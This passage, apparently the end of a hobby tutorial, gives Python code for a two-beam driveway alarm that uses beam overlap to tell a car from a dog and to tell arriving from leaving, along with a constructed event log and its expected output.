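                direction = "arriving" if first_dark == "outer" else "leaving"
                alarms.append((t, direction))
                armed = False
        else:
            armed = True                   # re-arm once the pair is no longer both dark
    return alarms


# Constructed event log: a dog crossing the beams one at a time (no alarm),
# a car pulling in (alarm, arriving), and the same car backing out (alarm, leaving).
SAMPLE_EVENTS: List[Event] = [
    (1.0, "outer", "break"), (1.5, "outer", "restore"),      # dog, outer beam only
    (2.0, "inner", "break"), (2.5, "inner", "restore"),      # dog, inner beam only
    (10.0, "outer", "break"), (10.6, "inner", "break"),      # car arriving
    (11.0, "outer", "restore"), (11.5, "inner", "restore"),
    (20.0, "inner", "break"), (20.5, "outer", "break"),      # car leaving
    (21.0, "inner", "restore"), (21.4, "outer", "restore"),
]

if __name__ == "__main__":
    for when, direction in double_break_alarms(SAMPLE_EVENTS):
        print(f"t={when:5.1f}s alarm: vehicle {direction}")
```

Replaying the constructed log yields two alarms (at 10.6 s arriving, at 20.5 s leaving) and none for the dog; the same overlap-rather-than-sequence test is what keeps a single stray break from paging anyone.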